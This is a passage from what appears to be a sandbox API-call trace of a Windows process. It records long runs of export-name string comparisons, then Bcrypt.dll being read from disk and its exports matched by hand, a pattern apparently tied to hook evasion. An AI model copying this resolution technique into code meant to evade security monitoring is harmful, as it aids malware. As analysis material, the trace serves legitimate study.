(lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0130.170] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0130.171] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.172] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0130.173] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0130.174] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0130.175] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0130.175] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0130.175] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0130.175] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0130.176] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0130.177] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0130.633] GetProcessHeap () returned 0x460000 [0130.633] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x407a040 | out: hHeap=0x460000) returned 1 [0131.542] GetProcessHeap () returned 0x460000 [0131.542] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479270 [0131.544] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0131.554] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0131.554] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0131.554] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0131.554] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0131.555] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0131.555] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0131.555] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0131.555] GetProcessHeap () returned 0x460000 [0131.555] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x26fa0) returned 0x2cb2010 [0131.557] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0131.557] ReadFile (in: hFile=0x15c, lpBuffer=0x2cb2010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb2010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0131.561] CloseHandle (hObject=0x15c) returned 1 [0131.561] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0131.561] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0131.561] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0131.561] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0131.561] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.561] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0131.561] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0131.561] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0131.562] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0131.562] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0131.562] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0131.562] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0131.562] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.562] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0131.563] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0131.563] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0131.563] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0131.564] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0131.564] 